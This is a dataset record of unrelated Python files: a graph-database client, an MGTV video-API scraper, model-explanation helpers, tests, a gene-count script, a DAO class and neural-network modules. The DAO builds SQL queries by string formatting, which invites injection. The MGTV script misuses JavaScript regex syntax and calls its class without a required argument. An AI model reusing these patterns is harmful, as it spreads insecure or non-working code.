self.__removeEntities__[id].markDeleted()
if gLogger.isEnabled(TGLevel.Debug):
gLogger.log(TGLevel.Debug, "Transaction commit succeeded")
except IOError as e:
raise tgexception.TGException.buildException("IO Error", cause=e)
finally:
for id in self.__addEntities__:
self.__addEntities__[id].resetModifiedAttributes()
for id in self.__updateEntities__:
self.__updateEntities__[id].resetModifiedAttributes()
self.__addEntities__.clear()
self.__updateEntities__.clear()
self.__removeEntities__.clear()
def refreshMetadata(self):
self.__initMetadata__()
def rollback(self):
self.__addEntities__.clear()
self.__updateEntities__.clear()
self.__removeEntities__.clear()
def __sendConnectionProperties(self):
request: tgpduimpl.ConnectionPropertiesMessage = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.ConnectionPropertiesMessage, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.props = self.__channel__.properties
self.__channel__.send(request)
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Begin Bulk Import Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
def startImport(self, loadopt: typing.Union[str, tgbulk.TGLoadOptions] = tgbulk.TGLoadOptions.Insert,
erroropt: typing.Union[str, tgbulk.TGErrorOptions] = tgbulk.TGErrorOptions.Stop,
dateformat: typing.Union[str, tgbulk.TGDateFormat] = tgbulk.TGDateFormat.YMD,
props: typing.Optional[TGProperties] = None):
import tgdb.impl.bulkioimpl as tgbulkimpl
ret: tgbulkimpl.BulkImportImpl
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.BeginImportSessionRequest
request = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.BeginImportRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
if isinstance(loadopt, str):
loadopt = tgbulk.TGErrorOptions.findVal(loadopt)
if loadopt == tgbulk.TGLoadOptions.Invalid:
raise tgexception.TGException("Bad argument: cannot have an invalid load option!")
if isinstance(erroropt, str):
erroropt = tgbulk.TGErrorOptions.findVal(erroropt)
if erroropt == tgbulk.TGErrorOptions.Invalid:
raise tgexception.TGException("Bad argument: cannot have an invalid error option!")
if isinstance(dateformat, str):
dateformat = tgbulk.TGDateFormat.findVal(dateformat)
if dateformat == tgbulk.TGDateFormat.Invalid:
raise tgexception.TGException("Bad argument: cannot have an invalid Date-Time Format!")
request.loadopt = loadopt
request.erroropt = erroropt
request.dtformat = dateformat
response: tgpduimpl.BeginImportSessionResponse = self.__channel__.send(request, channelResponseWaiter)
if response.error is not None:
raise response.error
ret = tgbulkimpl.BulkImportImpl(self, props)
return ret
def partialImportEntity(self, entType: tgmodel.TGEntityType, reqIdx: int, totReqs: int, data: str,
attrList: typing.List[str]) -> typing.List[tgadm.TGImportDescriptor]:
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.PartialImportRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.PartialImportRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
request.type = entType
request.reqIdx = reqIdx
request.totalRequestsForType = totReqs
request.data = data
request.attrList = attrList
response: tgpduimpl.PartialImportResponse = self.__channel__.send(request, channelResponseWaiter)
if response.error is not None:
raise response.error
return response.resultList
def endBulkImport(self):
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.EndBulkImportSessionRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.EndImportRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
response: tgpduimpl.PartialImportResponse = self.__channel__.send(request, channelResponseWaiter)
return response.resultList
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// End Bulk Import Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Begin Bulk Export Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
def startExport(self, props: typing.Optional[TGProperties] = None, zip: typing.Optional[str] = None,
isBatch: bool = True):
import tgdb.impl.bulkioimpl as tgbulkimpl
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.BeginExportRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.BeginExportRequest, authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
request.zipName = zip
request.isBatch = isBatch
request.maxBatchEntities = int(ConfigName.BulkIOEntityBatchSize.defaultvalue)\
if props is None or props[ConfigName.BulkIOEntityBatchSize] is None else\
int(props[ConfigName.BulkIOEntityBatchSize])
response: tgpduimpl.BeginExportResponse = self.__channel__.send(request, channelResponseWaiter)
if response.error is not None:
raise response.error
return tgbulkimpl.BulkExportImpl(self, props, response.typeList, response.numRequests)
def partialExport(self, reqNum: int) -> typing.Tuple[str, bytes, bool, int,
typing.Optional[typing.Tuple[str, typing.List[str]]]]:
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.PartialExportRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.PartialExportRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.requestNum = reqNum
response: tgpduimpl.PartialExportResponse = self.__channel__.send(request, channelResponseWaiter)
return response.fileName, response.data, response.hasMore, response.numEntities,\
(response.typeName, response.attrList) if response.newType else None
"""
def startExport(self, props: Optional[TGProperties] = None) -> tgbulk.TGBulkExport:
channelResponseWaiter = self.__genBCRWaiter()
request = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.BeginBulkExportSessionRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
_ = self.__channel__.send(request, channelResponseWaiter)
return tgbulkimpl.BulkExportImpl(self, props)
def beginBatchExportEntity(self, entkind: tgmodel.TGEntityKind, enttype: tgmodel.TGEntityType, batchSize: int) \
-> Tuple[int, List[str]]:
channelResponseWaiter = self.__genBCRWaiter()
request: tgpduimpl.BeginBatchExportEntityRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.BeginBatchExportEntityRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.entKind = entkind
request.entType = enttype
request.batchSize = batchSize
response: tgpduimpl.BeginBatchExportEntityResponse = self.__channel__.send(request, channelResponseWaiter)
return response.descriptor, response.columnLabels
def singleBatchExportEntity(self, desc: int) -> Tuple[int, str, bool]:
channelResponseWaiter = self.__genBCRWaiter()
request: tgpduimpl.SingleBatchExportEntityRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.SingleBatchExportEntityRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.descriptor = desc
response: tgpduimpl.SingleBatchExportEntityResponse = self.__channel__.send(request, channelResponseWaiter)
return response.numEnts, response.data, response.hasMore
def endBulkExportSession(self):
channelResponseWaiter = self.__genBCRWaiter()
request: tgpduimpl.EndBulkExportSessionRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.EndBulkExportSessionRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
_ = self.__channel__.send(request, channelResponseWaiter)
"""
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// End Bulk Export Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
def getEntity(self, key: tgmodel.TGKey, option: tgquery.TGQueryOption = tgquery.DefaultQueryOption) ->\
tgmodel.TGEntity:
channelResponseWaiter = self._genBCRWaiter()
requestMessage: tgpduimpl.GetEntityRequestMessage
retV: tgmodel.TGEntity = None
try:
requestMessage = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.GetEntityRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
requestMessage.command = tgpduimpl.GetEntityCommand.GetEntity
requestMessage.key = key
response: tgpduimpl.GetEntityResponseMessage = self.__channel__.send(requestMessage, channelResponseWaiter)
if response.hasResult:
response.finishReadWith(self.graphObjectFactory)
fetchedEntities = response.fetchedEntities
for id in fetchedEntities:
fetchedEnt: tgmodel.TGEntity = fetchedEntities[id]
if key.matches(fetchedEnt):
retV = fetchedEnt
break
finally:
pass
return retV
def insertEntity(self, entity: tgmodel.TGEntity):
if not entity.isNew:
raise tgexception.TGException("Should only be calling insertEntity on a new entity!")
if entity.virtualId not in self.__removeEntities__:
self.__addEntities__[entity.virtualId] = entity
self.__updateEdge__(entity)
if gLogger.isEnabled(TGLevel.Debug):
gLogger.log(TGLevel.Debug, 'Insert entity called')
def updateEntity(self, entity: tgmodel.TGEntity):
if entity.isNew:
raise tgexception.TGException('Should not be calling update on a new entity!')
if entity.isDeleted:
raise tgexception.TGException('Should not be calling update on an already deleted entity!')
if entity.virtualId not in self.__removeEntities__:
self.__updateEntities__[entity.virtualId] = entity
self.__updateEdge__(entity)
def __updateEdge__(self, entity: tgmodel.TGEntity):
if isinstance(entity, tgentimpl.EdgeImpl):
edge: tgmodel.TGEdge = entity
fr, to = edge.vertices
if not fr.isNew and fr.virtualId not in self.__removeEntities__:
self.__updateEntities__[fr.virtualId] = fr
if not to.isNew and to.virtualId not in self.__removeEntities__:
self.__updateEntities__[to.virtualId] = to
def deleteEntity(self, entity: tgentimpl.AbstractEntity):
if entity.isDeleted:
raise tgexception.TGException('Should not be calling delete on an already deleted entity!')
# Remove any entities added to the add changelist
if entity.virtualId in self.__addEntities__:
del self.__addEntities__[entity.virtualId]
# Remove any entities added to the update changelist
if entity.virtualId in self.__updateEntities__:
del self.__updateEntities__[entity.virtualId]
if entity.isNew:
entity.markDeleted()
else:
self.__removeEntities__[entity.virtualId] = entity
self.__updateEdge__(entity)
def createQuery(self, query: str) -> tgquery.TGQuery:
channelResponseWaiter: tgchannel.TGChannelResponseWaiter
result: int
ret: tgquery.TGQuery = None
channelResponseWaiter = self._genBCRWaiter()
try:
request: tgpduimpl.QueryRequestMessage = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.QueryRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.command = tgquery.TGQueryCommand.Create
request.query = query
response: tgpduimpl.QueryResponseMessage = self.__channel__.send(request, channelResponseWaiter)
gLogger.log(TGLevel.Debug, "Send query completed")
result: int = response.result
queryHashId: int = response.queryHashId
if result == 0 and queryHashId > 0: #TODO Create error reporting for query result.
ret = tgqueryimpl.QueryImpl(self, queryHashId)
finally:
pass
return ret
def executeQuery(self, query: typing.Optional[str] = None,
option: tgquery.TGQueryOption = tgquery.DefaultQueryOption) -> tgquery.TGResultSet:
if query is None:
try:
query = option.queryExpr
except KeyError as e:
raise tgexception.TGException("Need to specify a query string!", cause=e)
channelResponseWaiter: tgchannel.TGChannelResponseWaiter = self._genBCRWaiter()
result: int
try:
request: tgpduimpl.QueryRequestMessage = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.QueryRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.option = option
request.command, request.query = findCommandAndQueryString(query, self.__props__)
response: tgpduimpl.QueryResponseMessage = self.__channel__.send(request, channelResponseWaiter)
if response.error is not None:
raise response.error
return response.finishReadWith(request.command, self.__gof__)
except (Exception, tgexception.TGException):
raise
# TODO implement some form of compiled queries
def executeQueryWithId(self, queryId: int, option: tgquery.TGQueryOption = tgquery.DefaultQueryOption) -> \
tgquery.TGResultSet:
result: int
channelResponseWaiter: tgchannel.TGChannelResponseWaiter = self._genBCRWaiter()
try:
request: tgpduimpl.QueryRequestMessage = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.QueryRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.command = tgquery.TGQueryCommand.ExecuteID
request.queryHashId = queryId
request.option = option
response: tgpduimpl.QueryResponseMessage = self.__channel__.send(request, channelResponseWaiter)
return response.finishReadWith(tgquery.TGQueryCommand.ExecuteID, self.__gof__)
except Exception as e:
raise tgexception.TGException("Exception in executeQueryWithId", cause=e)
def closeQuery(self, queryId: int):
channelResponseWaiter: tgchannel.TGChannelResponseWaiter = self._genBCRWaiter()
try:
request: tgpduimpl.QueryRequestMessage = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.QueryRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.command = tgquery.TGQueryCommand.Close
request.queryHashId = queryId
_: tgpduimpl.QueryResponseMessage = self.__channel__.send(request, channelResponseWaiter)
# TODO check response state
gLogger.log(TGLevel.Debug, "Send close query completed")
except Exception as e:
raise tgexception.TGException("Exception in closeQuery", cause=e)
def getLargeObjectAsBytes(self, entityId: int, encrypted: bool = False) -> bytes:
channelResponseWaiter = self._genBCRWaiter()
if encrypted: # TODO Decrypt encrypted entities
raise tgexception.TGProtocolNotSupported("Blob/Clob encryption/decryption not implemented.")
request: tgpduimpl.GetLargeObjectRequestMessage = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.GetLargeObjectRequest, authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
request.entityId = entityId
request.decrypt = encrypted
response: tgpduimpl.GetLargeObjectResponseMessage = self.__channel__.send(request, channelResponseWaiter)
if entityId != response.entityId:
raise tgexception.TGException("Server responded with different entityId than expected!")
data = bytes() if response.data is None else response.data
return data
@property
def linkState(self) -> tgchannel.LinkState:
return self.__channel__.linkstate
@property
def outboxaddr(self) -> str:
return self.__channel__.outboxaddr
@property
def connectedUsername(self) -> str:
return self.__username__
@property
def graphMetadata(self) -> tgmodel.TGGraphMetadata:
return self.__gof__.graphmetadata
@property
def graphObjectFactory(self) -> tgmodel.TGGraphObjectFactory:
return self.__gof__
| nilq/baby-python | python |
import base64
import requests
import uuid
import time
class MGTV:
def __init__(self, url):
self.url = url
def get_video_id(self):
return self.url.split("/", 5)[-1].split(".")[0]
def get_pm2(self):
did = "e6e13014-393b-43e7-b6be-2323e4960939"
suuid = uuid.uuid4()
pno = "1030"
# tk2 = self.encode_tk2(did, pno)
params = {
"did": did,
"suuid": suuid,
"cxid": "",
"tk2": self.encode_tk2(did, pno),
"type": "pch5",
"video_id": self.get_video_id(),
"_support": "10000000",
"auth_mode": "1",
"src": "",
"abroad": "",
}
res = requests.get("https://pcweb.api.mgtv.com/player/video", params=params).json()
return res['data']['atc']['pm2']
def encode_tk2(self, did="e6e13014-393b-43e7-b6be-2323e4960939", pno="1030"):
tk2 = bytes(f"did={did}|pno={pno}|ver=0.3.0301|clit={int(time.time())}".encode())
tk2 = base64.b64encode(tk2).decode().replace("/\+/g", "_").replace("/\//g", "~").replace("/=/g", "-")
tk2 = list(' '.join(tk2).split())
tk2.reverse()
return "".join(tk2)
def start(self):
params = {
"_support": "10000000",
"tk2": self.encode_tk2(),
"pm2": self.get_pm2(),
"video_id": self.get_video_id(),
"type": "pch5",
"auth_mode": "1",
"src": "",
"abroad": "",
}
res = requests.get("https://pcweb.api.mgtv.com/player/getSource", params=params).json()
print(res)
return res
if __name__ == '__main__':
MGTV().start()
| nilq/baby-python | python |
import copy
import pickle
import torch
import types
from . import layers
from . import rules
Rules = rules.Rules
def flatten_model(module):
'''
flatten modul to base operation like Conv2, Linear, ...
'''
modules_list = []
for m_1 in module.children():
if len(list(m_1.children())) == 0:
modules_list.append(m_1)
else:
modules_list = modules_list + flatten_model(m_1)
return modules_list
def copy_module(module):
'''
sometimes copy.deepcopy() does not work
'''
module = copy.deepcopy(pickle.loads(pickle.dumps(module)))
module._forward_hooks.popitem() # remove hooks from module copy
module._backward_hooks.popitem() # remove hooks from module copy
return module
def redefine_nn(model, rule, input_lowest, input_highest):
'''
go over model layers and overload chosen instance methods (e.g. forward()).
New methods come from classes of layers module
'''
rule_func = Rules(rule)
list_of_layers = dir(layers) #list of redefined layers in layers module
for num, module in enumerate(flatten_model(model)):
if module.__class__.__name__ in list_of_layers:
local_class = module.__class__ #current layer class
layer_module_class = layers.__getattr__(local_class.__name__) # get same redefined layer class
list_of_methods = [attr for attr in dir(layer_module_class) if attr[:2] != '__'] #methods which was redefined
for l in list_of_methods:
#overload object method from https://stackoverflow.com/questions/394770/override-a-method-at-instance-level
setattr(module, l, types.MethodType(getattr(layer_module_class, l), module)) #set redefined methods to object
if num == 0:
setattr(module, 'rule_func', Rules('z_box_no_bias', lowest=input_lowest, highest=input_highest)) #first layer always z_box
else:
setattr(module, 'rule_func', rule_func)
return model
| nilq/baby-python | python |
import pytest
import os
from tddc import common
def test_get_base_filename():
assert common.get_base_filename('/Users/foo/bar.txt') == 'bar'
assert common.get_base_filename('bar.txt') == 'bar'
assert common.get_base_filename('bar') == 'bar'
assert common.get_base_filename('bar.txt.gz') == 'bar.txt'
def test_write_summary(tmpdir):
summary_data = {'a': 1, 'b': {'c': 2, 'd': 3}, 'e': [1, 2, 3]}
filename = common.write_summary(summary_data, tmpdir.strpath, 'foo', 'bar')
assert os.path.basename(filename) == 'foo_barsummary.json'
summary_data_from_file = common.read_json_file(filename)
assert summary_data_from_file == summary_data
def test_file_exists_or_exit():
with pytest.raises(SystemExit) as exception_info:
common.file_exists_or_exit('foo.bar.baz')
assert exception_info.value.code == 1
assert common.file_exists_or_exit(__file__) is None
| nilq/baby-python | python |
# compare gene numbers in different samples
import pandas as pd
import scanpy as sc
import matplotlib.pyplot as plt
import seaborn as sns
from pathlib import Path
from scipy.stats import ttest_ind
import scipy.stats as stats
import scikit_posthocs as sp
#-------------------variable--------------------------------
fmt='png'
fd_in='./out/a00_preprocess_00_pp'
fd_out='./out/a01_plot-pp_00_compare'
l_sample=['Ctrl', 'MethFix', 'RNAlater']
dic_cmap={'Ctrl': '#4287f5', 'MethFix': '#f5a142', 'RNAlater': '#4bf542'}
#--------------------setup---------------------------------
Path(fd_out).mkdir(exist_ok=True, parents=True)
#--------------------function----------------------------
def get_gene_cnt(prefix, l_sample=l_sample, fd_in=fd_in):
'''count genes in each adata, and concat count dfs
'''
#1. add gene count df to list
l_df=[]
for sample in l_sample:
adata=sc.read(f'{fd_in}/{prefix}_{sample}.h5ad')
sc.pp.filter_cells(adata, min_genes=0) #this will count genes in each cell
l_df.append(adata.obs)
#2. concat df
df=pd.concat(l_df)
return df
def plot_gene(df, f_out, title, dic_cmap=dic_cmap, ylim=None):
#1. plot
sns.set()
fig, ax=plt.subplots(figsize=(8, 5))
ax=sns.violinplot(x='sample', y='n_genes', data=df, hue='sample', linewidth=0.5, width=1.5, palette=dic_cmap)
#2. adjust
ax.set_title(title, fontsize=20, pad=15, weight='medium')
plt.xlabel('')
plt.ylabel('Gene Number', fontsize=22, labelpad=15, weight='medium')
plt.xticks([-0.5, 1, 2.5], fontsize=22, rotation=0, va='center')
ax.tick_params(axis='x', which='major', pad=15)
plt.xlim([-1, 3])
plt.ylim(ylim)
ax.get_legend().remove()
#3. save
plt.tight_layout()
plt.savefig(f_out, dpi=300)
plt.close()
return
############################################################################
#----------------------raw data------------------------------
prefix='raw'
#1. count df
df=get_gene_cnt(prefix)
##2. plot
#f_out=f'{fd_out}/{prefix}_gene.{fmt}'
#title=f'Gene Numbers ({prefix.capitalize()})'
#plot_gene(df, f_out, title, ylim=[-1000, 16000])
##3. calculate p value
#ctrl=df.loc[df['sample']=='Ctrl']['n_genes']
#meth=df.loc[df['sample']=='MethFix']['n_genes']
#later=df.loc[df['sample']=='RNAlater']['n_genes']
#t1, p1=ttest_ind(ctrl, meth)
#print(p1) #0
#t2, p2=ttest_ind(ctrl, later)
#print(p2) #0
#t3, p3=ttest_ind(meth, later)
#print(p3) #0.03836
#---------------------anova------------------------------------
##1. get data
#l_ctrl=df.loc[df['sample']=='Ctrl', ['n_genes']]['n_genes'].tolist()
#l_meth=df.loc[df['sample']=='MethFix', ['n_genes']]['n_genes'].tolist()
#l_later=df.loc[df['sample']=='RNAlater', ['n_genes']]['n_genes'].tolist()
#l_all=[l_ctrl, l_meth, l_later]
##2. avova
#fvalue, pvalue=stats.f_oneway(l_ctrl, l_meth, l_later)
#print(fvalue, pvalue) #4148.3173795985 0.0
##3. post hoc ttest
#p=sp.posthoc_conover(l_all, p_adjust='holm')
#print(p)
'''
1 2 3
1 -1.0 0.000000 0.000000
2 0.0 -1.000000 0.880754
3 0.0 0.880754 -1.000000
'''
#########################################################################
##----------------------cleaned data------------------------------
#prefix='clean'
##1. count df
#df=get_gene_cnt(prefix)
##2. plot
#f_out=f'{fd_out}/{prefix}_gene.{fmt}'
#title=f'Gene Numbers ({prefix.capitalize()})'
#plot_gene(df, f_out, title, ylim=[0, 4500])
##3. calculate p value
#ctrl=df.loc[df['sample']=='Ctrl']['n_genes']
#meth=df.loc[df['sample']=='MethFix']['n_genes']
#later=df.loc[df['sample']=='RNAlater']['n_genes']
#t1, p1=ttest_ind(ctrl, meth)
#print(p1) #0
#t2, p2=ttest_ind(ctrl, later)
#print(p2) #0
#t3, p3=ttest_ind(meth, later)
#print(p3) #6.629720921642305e-78
| nilq/baby-python | python |
#
# Este arquivo é parte do programa multi_agenda
#
# Esta obra está licenciada com uma
# Licença Creative Commons Atribuição 4.0 Internacional.
# (CC BY 4.0 Internacional)
#
# Para ver uma cópia da licença, visite
# https://creativecommons.org/licenses/by/4.0/legalcode
#
# WELLINGTON SAMPAIO - [email protected]
# https://www.linkedin.com/in/wellsampaio/
#
import objetos.financeiro.TipoConta as TipoConta
import objetos.dbConn.CRUD as CRUD
class TipoContaDAO(CRUD.CRUD):
__sqlInsert = ""
__sqlUpdate = ""
def __init__(self):
schema = "financeiro"
tabela = "tiposContas"
pk = "codTipoConta"
super().__init__(schema, tabela, pk)
self.__sqlInsert = super().strINSERT()
self.__sqlUpdate = super().strUPDATE()
# ==================================== CRUD ====================================
# ==============================================================================
def insert(self, tipoConta):
self.setStatement(tipoConta, self.__sqlInsert)
def select(self, pk):
obj = TipoConta.TipoConta()
super().setSelect(pk, obj)
return obj
def update(self, tipoConta):
self.setStatement(tipoConta, self.__sqlUpdate)
def setStatement2(self, obj):
getPk = getattr(obj,
"get" +
self.__pk[:1].upper() +
self.__pk[1:]
)
return getPk()
# ==================================== CRUD ====================================
# ==============================================================================
def getLista(self):
sql = \
"""
SELECT
*
FROM
tiposContas
ORDER BY
codTipoConta
;
"""
return super().getList(sql)
def listaPrincipais(self):
sql = \
"""
SELECT
*
FROM
tiposContas
WHERE
tipoContaAtivo = 1
ORDER BY
TipoConta
;
"""
return super().getList(sql)
def naoListadasNoPeriodo(self, dtRef):
sql = \
"""
SELECT
*
FROM
tiposContas
WHERE
codTipoConta NOT IN(
SELECT
codTipoConta
FROM
contas
WHERE
strftime('%Y-%m',dtVencimento) = '{}'
) AND
tipoContaAtivo = 1
ORDER BY
tipoConta
;
""".format(dtRef)
return super().getList(sql)
def contaOcorrenciasPelaReferencia(self, codTipoConta, dtRef, tipoRef):
if tipoRef == "pgto":
tipoRef = "receita.mesReferencia"
#elif tipoRef = "venc":
else:
tipoRef = "contas.dtVencimento"
sql = \
"""
SELECT COUNT(codConta) FROM contas LEFT JOIN receita ON contas.codReceitaPagadora = receita.codReceita
WHERE strftime("%Y-%m", {}) = '{}' AND codTipoConta = {};
""".format(tipoRef, dtRef, codTipoConta)
return "{0:.0f}".format(super().getValue(sql, 0.0))
def listaCmb(self):
sql = \
"""
SELECT
*
FROM
tiposContas
ORDER BY
tipoConta
;
"""
return super().getList(sql)
| nilq/baby-python | python |
# Generated by Django 2.2.16 on 2020-09-21 16:18
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('contest', '0001_initial'),
('lecture', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='signup_class',
name='contest',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='contest.Contest'),
),
]
| nilq/baby-python | python |
import torch.nn as nn
import torch.nn.functional as F
from torch import cat, stack, sqrt
class MLPNetwork(nn.Module):
"""
MLP network (can be used as value or policy)
"""
def __init__(self, input_dim, out_dim, hidden_dim=64, nonlin=F.relu,
constrain_out=False, norm_in=True, discrete_action=True):
"""
Inputs:
input_dim (int): Number of dimensions in input
out_dim (int): Number of dimensions in output
hidden_dim (int): Number of hidden dimensions
nonlin (PyTorch function): Nonlinearity to apply to hidden layers
"""
super(MLPNetwork, self).__init__()
if norm_in: # normalize inputs
self.in_fn = nn.BatchNorm1d(input_dim)
self.in_fn.weight.data.fill_(1)
self.in_fn.bias.data.fill_(0)
else:
self.in_fn = lambda x: x
self.fc1 = nn.Linear(input_dim, hidden_dim)
self.fc2 = nn.Linear(hidden_dim, hidden_dim)
self.fc3 = nn.Linear(hidden_dim, out_dim)
self.nonlin = nonlin
if constrain_out and not discrete_action:
# initialize small to prevent saturation
self.fc3.weight.data.uniform_(-3e-3, 3e-3)
self.out_fn = F.tanh
else: # logits for discrete action (will softmax later)
self.out_fn = lambda x: x
def forward(self, X):
"""
Inputs:
X (PyTorch Matrix): Batch of observations
Outputs:
out (PyTorch Matrix): Output of network (actions, values, etc)
"""
h1 = self.nonlin(self.fc1(self.in_fn(X)))
h2 = self.nonlin(self.fc2(h1))
out = self.out_fn(self.fc3(h2))
return out
class ConvMLPNetwork(nn.Module):
"""
Conv + MLP network (can be used as value or policy)
"""
def __init__(self, input_dim, out_dim):
"""
Inputs:
input_dim (int): Number of dimensions in input
out_dim (int): Number of dimensions in output
hidden_dim (int): Number of hidden dimensions
nonlin (PyTorch function): Nonlinearity to apply to hidden layers
"""
super(ConvMLPNetwork, self).__init__()
self.in_fn = nn.BatchNorm2d(3)
self.in_fn.weight.data.fill_(1)
self.in_fn.bias.data.fill_(0)
# Define image embedding
self.image_conv = nn.Sequential(
nn.Conv2d(3, 16, (2, 2)),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
nn.Conv2d(16, 32, (2, 2)),
nn.ReLU(),
nn.Conv2d(32, 64, (2, 2)),
nn.ReLU()
)
self.mlpnet = nn.Sequential(
nn.Linear(input_dim, 64),
nn.Tanh(),
nn.Linear(64, out_dim)
)
self.apply(init_params)
def forward(self, obss, actions=None, critic=False, debug=False):
"""
Inputs:
X (PyTorch Matrix): Batch of observations
Outputs:
out (PyTorch Matrix): Output of network (actions, values, etc)
"""
if not critic:
x = obss
if debug:
print('----------')
print('obss:')
print(x)
if len(x.shape) < 4:
x = x.unsqueeze(0).transpose(1, 3).transpose(2, 3)
else:
x = x.transpose(1, 3).transpose(2, 3)
x = self.in_fn(x)
x = self.image_conv(x)
x = x.reshape(x.shape[0], -1)
if debug:
print('----------')
print('conv out:')
print(x)
out = self.mlpnet(x)
if debug:
print('----------')
print('mlp out:')
print(out)
return out
else:
x = stack(obss)
num_agents = x.shape[0]
num_batches = x.shape[1]
x = x.reshape(-1, *x.shape[-3:])
x = x.transpose(1, 3).transpose(2, 3)
x = self.in_fn(x)
x = self.image_conv(x)
x = x.reshape(x.shape[0], -1)
x = x.reshape(num_agents, num_batches, x.shape[1])
act = stack(actions)
concat = cat((*x, *act), dim=1)
out = self.mlpnet(concat)
return out
# Function from https://github.com/ikostrikov/pytorch-a2c-ppo-acktr/blob/master/model.py
def init_params(m):
classname = m.__class__.__name__
if classname.find("Linear") != -1:
m.weight.data.normal_(0, 1)
m.weight.data *= 1 / sqrt(m.weight.data.pow(2).sum(1, keepdim=True))
if m.bias is not None:
m.bias.data.fill_(0)
| nilq/baby-python | python |
import re
from datetime import date, datetime, timezone
from urllib.parse import urljoin, urlparse
import pytest
from swpt_debtors import procedures as p
from swpt_debtors import models as m
@pytest.fixture(scope='function')
def client(app, db_session):
return app.test_client()
@pytest.fixture(scope='function')
def debtor(db_session):
debtor = m.Debtor(debtor_id=123, status_flags=0)
debtor.activate()
db_session.add(debtor)
db_session.commit()
return p.get_debtor(123)
def _get_all_pages(client, url, page_type, streaming=False):
r = client.get(url)
assert r.status_code == 200
data = r.get_json()
assert data['type'] == page_type
assert urlparse(data['uri']) == urlparse(url)
if streaming:
assert 'next' in data or 'forthcoming' in data
assert 'next' not in data or 'forthcoming' not in data
else:
assert 'forthcoming' not in data
items = data['items']
assert isinstance(items, list)
if 'next' in data:
items.extend(_get_all_pages(client, urljoin(url, data['next']), page_type, streaming))
return items
def test_auto_genereate_debtor_id(client):
r = client.post('/debtors/.debtor-reserve', json={})
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'DebtorReservation'
assert isinstance(data['debtorId'], str)
assert isinstance(data['reservationId'], int)
assert datetime.fromisoformat(data['validUntil'])
assert datetime.fromisoformat(data['createdAt'])
def test_create_debtor(client):
r = client.get('/debtors/4294967296/')
assert r.status_code == 403
r = client.post('/debtors/4294967296/reserve', headers={'X-Swpt-User-Id': 'INVALID_USER_ID'}, json={})
assert r.status_code == 403
r = client.post('/debtors/2/reserve', headers={'X-Swpt-User-Id': 'debtors:4294967296'}, json={})
assert r.status_code == 403
r = client.post('/debtors/4294967296/reserve', json={})
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'DebtorReservation'
assert data['debtorId'] == '4294967296'
assert isinstance(data['reservationId'], int)
assert datetime.fromisoformat(data['validUntil'])
assert datetime.fromisoformat(data['createdAt'])
reservation_id = data['reservationId']
r = client.post('/debtors/4294967296/reserve', json={})
assert r.status_code == 409
r = client.get('/debtors/4294967296/')
assert r.status_code == 403
r = client.post('/debtors/4294967296/activate', json={
'reservationId': 123,
})
assert r.status_code == 422
assert 'reservationId' in r.get_json()['errors']['json']
r = client.post('/debtors/4294967296/activate', json={
'reservationId': reservation_id,
})
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'Debtor'
assert data['uri'] == '/debtors/4294967296/'
assert data['identity'] == {'type': 'DebtorIdentity', 'uri': 'swpt:4294967296'}
assert data['transfersList'] == {'uri': '/debtors/4294967296/transfers/'}
assert data['createTransfer'] == {'uri': '/debtors/4294967296/transfers/'}
